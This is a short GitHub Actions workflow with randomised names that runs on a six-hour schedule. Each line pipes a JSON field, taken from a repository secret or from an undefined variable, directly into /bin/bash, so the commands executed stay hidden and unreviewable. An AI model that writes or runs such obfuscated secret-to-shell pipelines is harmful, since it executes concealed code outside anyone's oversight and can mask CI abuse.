name: nongyuanhui7654

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongyuanhui7654
        env:
          mk46522: ${{ secrets.mk46522 }}
        run: |
          echo $mk46522 | jq -r .bnnxh68770 | /bin/bash
          echo $hqmvr75 | jq -r .uqfeh451 | /bin/bash
          echo $qribc95093 | jq -r .cxou5675 | /bin/bash
          echo $vqbv23986 | jq -r .t8769 | /bin/bash
          echo $u51298 | jq -r .f928 | /bin/bash
          echo $fk767 | jq -r .lgx5538 | /bin/bash
          echo $uqo1 | jq -r .lucw3 | /bin/bash
          echo $qb918 | jq -r .qmlxw72 | /bin/bash
          echo $uyi496 | jq -r .egh6214 | /bin/bash
          echo $kl66 | jq -r .yxbb7610 | /bin/bash

